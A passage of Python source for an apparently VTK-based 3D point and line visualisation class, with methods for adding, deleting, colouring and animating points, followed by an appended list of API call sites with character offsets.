lines (list, tuple, np.ndarray, np.generic):
An array in the format of [2, point_a, point_b, 2, point_c, point_d, ...]. The two is needed for VTK's
lines.
line_colors (list, tuple, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
lines.
Returns:
list: An array containing the memory locations of each of the newly inserted lines.
"""
assert (isinstance(lines, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(line_colors, (list, tuple, np.ndarray, np.generic)))
np_line_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_line_color_data = numpy_support.vtk_to_numpy(self.line_colors)
#todo: add lines in unused locations if possible
mem_locations = range(int(len(np_line_data) / 3), int((len(np_line_data) + len(lines)) / 3))
np_line_data = np.append(np_line_data, lines)
if len(np_line_color_data) > 0:
np_line_color_data = np.append(np_line_color_data, line_colors, axis=0)
else:
np_line_color_data = line_colors
vtk_line_data = numpy_support.numpy_to_vtkIdTypeArray(np_line_data, deep=True)
self.lines.SetCells(int(len(np_line_data) / 3), vtk_line_data)
vtk_line_color_data = numpy_support.numpy_to_vtk(num_array=np_line_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_line_color_data)
self.lines_poly.Modified()
self.line_id_array.add_ids(mem_locations)
return mem_locations
def del_all_lines(self):
"""
Deletes all lines.
"""
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np.array([], dtype=np.int64), deep=True)
self.lines.SetCells(0, vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np.array([]), deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_lines(self, line_indices):
#todo: change idarray to use tuples of (start,end) locations and set this to delete those partitions
"""
Delete specific lines.
Args:
line_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing line memory locations(s) to delete.
"""
np_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_color_data = numpy_support.vtk_to_numpy(self.line_colors)
if isinstance(line_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
np_new_data = []
np_new_color_data = []
for i in range(len(line_indices)):
loc = self.line_id_array.pop_id(line_indices[i])
if loc==None:
#todo: put warning here
continue
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
else:
np_new_data = np_data[(last_loc + 1) * 3:loc * 3]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
np_new_color_data = np_color_data[(last_loc + 1):loc]
last_loc = loc
last_loc = loc
loc = len(np_data) / 3
np_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
np_data = np_data.astype(np.int64)
np_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_data, deep=True)
self.lines.SetCells(int(len(np_data) / 3), vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_points(self, point_indices):
"""
Delete specific points.
Args:
point_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing point memory locations(s) to delete.
"""
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())#1,1,1,2,1,3,1,4,1,5,1,6...
print(len(np_vert_data), len(np_point_data), len(np_point_color_data))
if isinstance(point_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
subtractor = 0
np_new_data = []
np_new_color_data = []
np_new_verts = []
for i in range(len(point_indices)):
loc = self.point_id_array.pop_id(point_indices[i])
if loc == None:
# todo: put warning here
continue
subtractor+=1
#I could just remove the end of the array, but this keeps the lines attached to the same points
if len(np_new_verts) >0:
np_new_verts = np.append(np_new_verts, np_vert_data[(last_loc+1)*2:loc*2], axis = 0)
else:
np_new_verts = np_vert_data[(last_loc+1)*2: loc*2]
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
else:
np_new_data = np_point_data[(last_loc + 1):loc]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1)*3:loc*3], axis=0)
else:
np_new_color_data = np_point_color_data[(last_loc + 1):loc]
last_loc = loc
if loc == None:
return
last_loc = loc
loc = len(np_point_data)
np_point_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
np_point_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1):loc], axis=0)
np_vert_data = np.append(np_new_verts, np_vert_data[(last_loc + 1)*2:loc*2], axis = 0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtk(np_point_data, deep=True)
self.points.SetData(vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data, deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
self.lines_poly.Modified()
def add_points(self, points, point_colors):
"""
Adds points in 3d space.
Args:
points (tuple, list, np.ndarray, np.generic):
An array in the format of [[x1,y1,z1], [x2,y2,x2], ..., [xn,yn,zn]]
point_colors (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added.
Returns:
"""
assert (isinstance(points, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(point_colors, (list, tuple, np.ndarray, np.generic)))
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())
print(np_vert_data)
for i in range(len(points)):
#todo: modify pointer_id_array to set free pointers to deleted data, not deleted data locations
if len(self.point_id_array.free_pointers)>0:
np_vert_data = np.append(np_vert_data, [1,self.point_id_array.free_pointers.pop()])
else:
np_vert_data = np.append(np_vert_data,[1, len(np_vert_data)/2])
mem_locations = range(int(len(np_point_data)), int((len(np_point_data) + len(points))))
if len(np_point_data) > 0:
np_point_data = np.append(np_point_data, points, axis=0)
else:
np_point_data = points
if len(point_colors) ==1:
points = np.array(points)
point_colors = np.tile(point_colors, (points.shape[0], 1))
if len(np_point_color_data) > 0:
np_point_color_data = np.append(np_point_color_data, point_colors, axis=0)
else:
np_point_color_data = point_colors
vtk_point_data = numpy_support.numpy_to_vtk(num_array=np_point_data, deep=True, array_type=vtk.VTK_FLOAT)
self.points.SetData(vtk_point_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data.astype(np.int64), deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
vtk_point_color_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_point_color_data)
self.points_poly.Modified()
self.point_id_array.add_ids(mem_locations)
#print(self.point_id_array)
return mem_locations
def add_point_field(self, widths, normal, center, color):
"""
Adds a rectangular field of points.
Args:
widths (tuple, list, np.ndarray, np.generic): an array defining the widths of each dimension of the field.
normal (tuple, list, np.ndarray, np.generic): an array defining the normal to the field. Specifies angle.
center (tuple, list, np.ndarray, np.generic): an array defining the central position of the field.
color (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added, or a single color in the form of [[r1, g1, b1]].
Returns:
A list of integers representing the memory locations where the points were added.
"""
true_normal = normalize(normal)
if not np.allclose(true_normal, [1, 0, 0]):
zn = np.cross(true_normal, [1, 0, 0])
xn = np.cross(true_normal, zn)
else:
xn = [1, 0, 0]
zn = [0, 0, 1]
point_field = np.array([])
#todo: replace for loops with numpy or gpu ops
for z in range(-int(m.floor(widths[2] / 2.0)), int(m.ceil(widths[2] / 2.0))):
for y in range(-int(m.floor(widths[1] / 2.0)), int(m.ceil(widths[1] / 2.0))):
for x in range(-int(m.floor(widths[0] / 2.0)), int(m.ceil(widths[0] / 2.0))):
vector_space_matrix = np.column_stack(
(np.transpose(xn), np.transpose(true_normal), np.transpose(zn)))
translation = np.matmul([x, y, z], vector_space_matrix)
point_location = [center[0], center[1], center[2]] + translation
point_location = [point_location]
if len(point_field)>0:
point_field = np.append(point_field, point_location, axis = 0)
else:
point_field = point_location
return self.add_points(point_field, color) #returns ids
def set_bg_color(self, color):
"""
Sets the background color of the viewport.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
r, g, b = color[0]
r,g,b = (r/255.,g/255.,b/255.)
self.renderer.SetBackground((minmax(r, 0, 1), minmax(g, 0, 1), minmax(b, 0, 1)))
self.renderer.Modified()
def set_all_point_colors(self, color):
"""
Sets the color of every point.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data = np.tile(color, (np_color_data.shape[0], 1))
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
def set_point_colors(self, colors, point_indices=None):
if point_indices is None:
if isinstance(colors, (list, tuple, np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=colors, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data[point_indices] = colors
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
def setup_lerp_all_point_colors(self, color, fade_time):
"""
Sets all points to the same color, but uses lerping to slowly change the colors.
Args:
color ():
fade_time ():
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
self.next_colors = np.tile(color, (np_color_data.shape[0], 1))
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def lerp_point_colors(self, colors, fade_time, point_indices=None):
"""
Sets colors for specific points, but uses lerping to slowly change those colors.
Args:
colors ():
fade_time ():
point_indices ():
"""
if isinstance(self.next_colors, (np.ndarray, np.generic)):
if isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
self.next_colors[point_indices] = colors
else:
self.next_colors = colors
self.next_color_indices = None
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)) or isinstance(colors, (list, tuple)):
if self.lerp_fade_time > 0:
self.next_colors = np.append(self.next_colors, colors)
if point_indices is not None:
self.next_color_indices = np.append(self.next_color_indices, point_indices)
else:
self.next_colors = colors
self.next_color_indices = point_indices
# must should not already be lerping
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
# fade time in seconds, float
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def set_lerp_remainder(self, lerp_remainder):
"""
Sets the portion of color from the previous color set remains after the lerp has been fully run.
Args:
lerp_remainder ():
"""
self.lerp_multiplier = 1 - lerp_remainder
def _calculate_point_color_lerp(self):
"""
Linearly interpolates colors. In addition to making animation look smoother, it helps prevent seizures a little.
Only a little though, and it has to be used correctly. Still, using it at all helps.
"""
if self.remaining_lerp_fade_time > 0:
# print(self.lerp_fade_time, self.remaining_lerp_fade_time)
lerp_val = self.lerp_multiplier * (
self.lerp_fade_time - self.remaining_lerp_fade_time) / self.lerp_fade_time
# print(lerp_val)
diff_array = (self.prev_colors - self.next_colors)
lerp_diff_array = diff_array * lerp_val
# print(lerp_diff_array)
lerp_colors = self.prev_colors - lerp_diff_array
# print(lerp_colors)
if isinstance(lerp_colors, (np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=lerp_colors, deep=True,
array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.remaining_lerp_fade_time -= self.loop_change_in_time
# print(self.remaining_lerp_fade_time)
def position_points(self, positions, point_indices=None):
#todo:unit test
"""
Untested with most recent changes.
Sets the positions of specific points, all points, or one point.
Args:
positions ():
point_indices ():
"""
if point_indices == None:
vtk_data = numpy_support.numpy_to_vtk(num_array=positions, deep=True, array_type=vtk.VTK_FLOAT)
self.points.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple)):
if isinstance(positions, (list, tuple)):
for i in range(len(point_indices)):
x, y, z = positions[i % len(positions)]
self.points.SetPoint(point_indices[i], (x, y, z))
else:
for i in range(len(point_indices)):
x, y, z = positions
self.points.SetPoint(point_indices[i], (x, y, z))
else:
x, y, z = positions
self.points.SetPoint(point_indices, (x, y, z))
self.points_poly.Modified()
def add_key_input_functions(self, keydic):
"""
Sets functions to be called when specific keys are pressed, in order from shallowest to deepest dictionaries.
If a key is already in the dictionary, it will be replaced.
Args:
keydic ():
"""
self.interactor_style.append_input_combinations(keydic)
def at_start(self):
"""
Function to be run after class instantiation and vtk start up. Useful for setting things that can only be set
after VTK is running.
"""
pass
def loop(self, obj, event):
"""
Function called every few milliseconds when VTK is set to call. Variables that need updating like change_in_time
can be set here.
Args:
obj ():
event ():
"""
self.loop_change_in_time = time.clock() - self._loop_time
self._loop_time = time.clock()
self._calculate_point_color_lerp()
pass
def at_end(self):
"""
Function called when animation is ended.
"""
self.interactive_renderer.RemoveAllObservers()
def exit(self):
# needed to stop previous setups from being run on next class call
# proper cleanup
self.interactive_renderer.TerminateApp()
def execute(self, obj, event):
"""
Function called to start animation.
Args:
obj ():
event ():
"""
if not self._started:
self.at_start()
self._started = True
self.loop(obj, event)
self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.interactive_renderer = obj
self.interactive_renderer.GetRenderWindow().Render()
| [
"numpy.tile",
"numpy.allclose",
"math.ceil",
"numpy.cross",
"time.clock",
"math.floor",
"svtk.lib.toolbox.idarray.IdArray",
"vtk.util.numpy_support.numpy_to_vtkIdTypeArray",
"svtk.lib.toolbox.integer.minmax",
"numpy.append",
"numpy.array",
"numpy.matmul",
"vtk.util.numpy_support.numpy_to_vtk... | [((1209, 1221), 'time.clock', 'time.clock', ([], {}), '()\n', (1219, 1221), False, 'import time\n'), ((1264, 1276), 'time.clock', 'time.clock', ([], {}), '()\n', (1274, 1276), False, 'import time\n'), ((1322, 1334), 'time.clock', 'time.clock', ([], {}), '()\n', (1332, 1334), False, 'import time\n'), ((1361, 1373), 'time.clock', 'time.clock', ([], {}), '()\n', (1371, 1373), False, 'import time\n'), ((1513, 1522), 'svtk.lib.toolbox.idarray.IdArray', 'IdArray', ([], {}), '()\n', (1520, 1522), False, 'from svtk.lib.toolbox.idarray import IdArray\n'), ((1553, 1562), 'svtk.lib.toolbox.idarray.IdArray', 'IdArray', ([], {}), '()\n', (1560, 1562), False, 'from svtk.lib.toolbox.idarray import IdArray\n'), ((2506, 2550), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.line_colors'], {}), '(self.line_colors)\n', (2532, 2550), False, 'from vtk.util import numpy_support\n'), ((2734, 2764), 'numpy.append', 'np.append', (['np_line_data', 'lines'], {}), '(np_line_data, lines)\n', (2743, 2764), True, 'import numpy as np\n'), ((2974, 3036), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_line_data'], {'deep': '(True)'}), '(np_line_data, deep=True)\n', (3011, 3036), False, 'from vtk.util import numpy_support\n'), ((3139, 3244), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_line_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_line_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (3165, 3244), False, 'from vtk.util import numpy_support\n'), ((4367, 4411), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.line_colors'], {}), '(self.line_colors)\n', (4393, 4411), False, 'from vtk.util import numpy_support\n'), ((5769, 5826), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_data'], {'deep': '(True)'}), '(np_data, deep=True)\n', (5806, 5826), False, 'from vtk.util import numpy_support\n'), ((5908, 6009), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (5934, 6009), False, 'from vtk.util import numpy_support\n'), ((6474, 6519), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (6500, 6519), False, 'from vtk.util import numpy_support\n'), ((8646, 8698), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', (['np_point_data'], {'deep': '(True)'}), '(np_point_data, deep=True)\n', (8672, 8698), False, 'from vtk.util import numpy_support\n'), ((8757, 8863), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_point_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (8783, 8863), False, 'from vtk.util import numpy_support\n'), ((8925, 8987), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_vert_data'], {'deep': '(True)'}), '(np_vert_data, deep=True)\n', (8962, 8987), False, 'from vtk.util import numpy_support\n'), ((9859, 9904), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (9885, 9904), False, 'from vtk.util import numpy_support\n'), ((11027, 11120), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_data', 'deep': '(True)', 'array_type': 'vtk.VTK_FLOAT'}), '(num_array=np_point_data, deep=True, array_type=\n vtk.VTK_FLOAT)\n', (11053, 11120), False, 'from vtk.util import numpy_support\n'), ((11369, 11475), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_point_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (11395, 11475), False, 'from vtk.util import numpy_support\n'), ((12629, 12646), 'svtk.lib.toolbox.numpy_helpers.normalize', 'normalize', (['normal'], {}), '(normal)\n', (12638, 12646), False, 'from svtk.lib.toolbox.numpy_helpers import normalize\n'), ((12882, 12894), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (12890, 12894), True, 'import numpy as np\n'), ((14534, 14579), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (14560, 14579), False, 'from vtk.util import numpy_support\n'), ((14604, 14647), 'numpy.tile', 'np.tile', (['color', '(np_color_data.shape[0], 1)'], {}), '(color, (np_color_data.shape[0], 1))\n', (14611, 14647), True, 'import numpy as np\n'), ((14667, 14768), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (14693, 14768), False, 'from vtk.util import numpy_support\n'), ((15885, 15930), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (15911, 15930), False, 'from vtk.util import numpy_support\n'), ((15958, 16001), 'numpy.tile', 'np.tile', (['color', '(np_color_data.shape[0], 1)'], {}), '(color, (np_color_data.shape[0], 1))\n', (15965, 16001), True, 'import numpy as np\n'), ((16029, 16074), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (16055, 16074), False, 'from vtk.util import numpy_support\n'), ((21145, 21157), 'time.clock', 'time.clock', ([], {}), '()\n', (21155, 21157), False, 'import time\n'), ((2839, 2889), 'numpy.append', 'np.append', (['np_line_color_data', 'line_colors'], {'axis': '(0)'}), '(np_line_color_data, line_colors, axis=0)\n', (2848, 2889), True, 'import numpy as np\n'), ((3608, 3636), 'numpy.array', 'np.array', (['[]'], {'dtype': 'np.int64'}), '([], dtype=np.int64)\n', (3616, 3636), True, 'import numpy as np\n'), ((5424, 5491), 'numpy.append', 'np.append', (['np_new_data', 'np_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)\n', (5433, 5491), True, 'import numpy as np\n'), ((5569, 5638), 'numpy.append', 'np.append', (['np_new_color_data', 'np_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_color_data[last_loc + 1:loc], axis=0)\n', (5578, 5638), True, 'import numpy as np\n'), ((8239, 8302), 'numpy.append', 'np.append', (['np_new_data', 'np_point_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_data, np_point_data[last_loc + 1:loc], axis=0)\n', (8248, 8302), True, 'import numpy as np\n'), ((8340, 8415), 'numpy.append', 'np.append', (['np_new_color_data', 'np_point_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_point_color_data[last_loc + 1:loc], axis=0)\n', (8349, 8415), True, 'import numpy as np\n'), ((8446, 8519), 'numpy.append', 'np.append', (['np_new_verts', 'np_vert_data[(last_loc + 1) * 2:loc * 2]'], {'axis': '(0)'}), '(np_new_verts, np_vert_data[(last_loc + 1) * 2:loc * 2], axis=0)\n', (8455, 8519), True, 'import numpy as np\n'), ((10577, 10617), 'numpy.append', 'np.append', (['np_point_data', 'points'], {'axis': '(0)'}), '(np_point_data, points, axis=0)\n', (10586, 10617), True, 'import numpy as np\n'), ((10723, 10739), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (10731, 10739), True, 'import numpy as np\n'), ((10767, 10810), 'numpy.tile', 'np.tile', (['point_colors', '(points.shape[0], 1)'], {}), '(point_colors, (points.shape[0], 1))\n', (10774, 10810), True, 'import numpy as np\n'), ((10887, 10939), 'numpy.append', 'np.append', (['np_point_color_data', 'point_colors'], {'axis': '(0)'}), '(np_point_color_data, point_colors, axis=0)\n', (10896, 10939), True, 'import numpy as np\n'), ((12662, 12697), 'numpy.allclose', 'np.allclose', (['true_normal', '[1, 0, 0]'], {}), '(true_normal, [1, 0, 0])\n', (12673, 12697), True, 'import numpy as np\n'), ((12716, 12748), 'numpy.cross', 'np.cross', (['true_normal', '[1, 0, 0]'], {}), '(true_normal, [1, 0, 0])\n', (12724, 12748), True, 'import numpy as np\n'), ((12766, 12791), 'numpy.cross', 'np.cross', (['true_normal', 'zn'], {}), '(true_normal, zn)\n', (12774, 12791), True, 'import numpy as np\n'), ((19482, 19571), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'positions', 'deep': '(True)', 'array_type': 'vtk.VTK_FLOAT'}), '(num_array=positions, deep=True, array_type=vtk.\n VTK_FLOAT)\n', (19508, 19571), False, 'from vtk.util import numpy_support\n'), ((21088, 21100), 'time.clock', 'time.clock', ([], {}), '()\n', (21098, 21100), False, 'import time\n'), ((3747, 3759), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (3755, 3759), True, 'import numpy as np\n'), ((13009, 13032), 'math.ceil', 'm.ceil', (['(widths[2] / 2.0)'], {}), '(widths[2] / 2.0)\n', (13015, 13032), True, 'import math as m\n'), ((14194, 14209), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['r', '(0)', '(1)'], {}), '(r, 0, 1)\n', (14200, 14209), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((14211, 14226), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['g', '(0)', '(1)'], {}), '(g, 0, 1)\n', (14217, 14226), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((14228, 14243), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['b', '(0)', '(1)'], {}), '(b, 0, 1)\n', (14234, 14243), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((15005, 15099), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'colors', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=colors, deep=True, array_type=vtk.\n VTK_UNSIGNED_CHAR)\n', (15031, 15099), False, 'from vtk.util import numpy_support\n'), ((15255, 15300), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (15281, 15300), False, 'from vtk.util import numpy_support\n'), ((15374, 15475), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (15400, 15475), False, 'from vtk.util import numpy_support\n'), ((18690, 18789), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'lerp_colors', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=lerp_colors, deep=True, array_type=vtk\n .VTK_UNSIGNED_CHAR)\n', (18716, 18789), False, 'from vtk.util import numpy_support\n'), ((4890, 4957), 'numpy.append', 'np.append', (['np_new_data', 'np_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)\n', (4899, 4957), True, 'import numpy as np\n'), ((5138, 5207), 'numpy.append', 'np.append', (['np_new_color_data', 'np_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_color_data[last_loc + 1:loc], axis=0)\n', (5147, 5207), True, 'import numpy as np\n'), ((7394, 7467), 'numpy.append', 'np.append', (['np_new_verts', 'np_vert_data[(last_loc + 1) * 2:loc * 2]'], {'axis': '(0)'}), '(np_new_verts, np_vert_data[(last_loc + 1) * 2:loc * 2], axis=0)\n', (7403, 7467), True, 'import numpy as np\n'), ((7633, 7696), 'numpy.append', 'np.append', (['np_new_data', 'np_point_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_data, np_point_data[last_loc + 1:loc], axis=0)\n', (7642, 7696), True, 'import numpy as np\n'), ((7877, 7967), 'numpy.append', 'np.append', (['np_new_color_data', 'np_point_color_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_color_data, np_point_color_data[(last_loc + 1) * 3:loc * 3\n ], axis=0)\n', (7886, 7967), True, 'import numpy as np\n'), ((12978, 13002), 'math.floor', 'm.floor', (['(widths[2] / 2.0)'], {}), '(widths[2] / 2.0)\n', (12985, 13002), True, 'import math as m\n'), ((13099, 13122), 'math.ceil', 'm.ceil', (['(widths[1] / 2.0)'], {}), '(widths[1] / 2.0)\n', (13105, 13122), True, 'import math as m\n'), ((13402, 13443), 'numpy.matmul', 'np.matmul', (['[x, y, z]', 'vector_space_matrix'], {}), '([x, y, z], vector_space_matrix)\n', (13411, 13443), True, 'import numpy as np\n'), ((16945, 16980), 'numpy.append', 'np.append', (['self.next_colors', 'colors'], {}), '(self.next_colors, colors)\n', (16954, 16980), True, 'import numpy as np\n'), ((17327, 17372), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (17353, 17372), False, 'from vtk.util import numpy_support\n'), ((13068, 13092), 'math.floor', 'm.floor', (['(widths[1] / 2.0)'], {}), '(widths[1] / 2.0)\n', (13075, 13092), True, 'import math as m\n'), ((13193, 13216), 'math.ceil', 'm.ceil', (['(widths[0] / 2.0)'], {}), '(widths[0] / 2.0)\n', (13199, 13216), True, 'import math as m\n'), ((13664, 13710), 'numpy.append', 'np.append', (['point_field', 'point_location'], {'axis': '(0)'}), '(point_field, point_location, axis=0)\n', (13673, 13710), True, 'import numpy as np\n'), ((17073, 17122), 'numpy.append', 'np.append', (['self.next_color_indices', 'point_indices'], {}), '(self.next_color_indices, point_indices)\n', (17082, 17122), True, 'import numpy as np\n'), ((13162, 13186), 'math.floor', 'm.floor', (['(widths[0] / 2.0)'], {}), '(widths[0] / 2.0)\n', (13169, 13186), True, 'import math as m\n'), ((13304, 13320), 'numpy.transpose', 'np.transpose', (['xn'], {}), '(xn)\n', (13316, 13320), True, 'import numpy as np\n'), ((13322, 13347), 'numpy.transpose', 'np.transpose', (['true_normal'], {}), '(true_normal)\n', 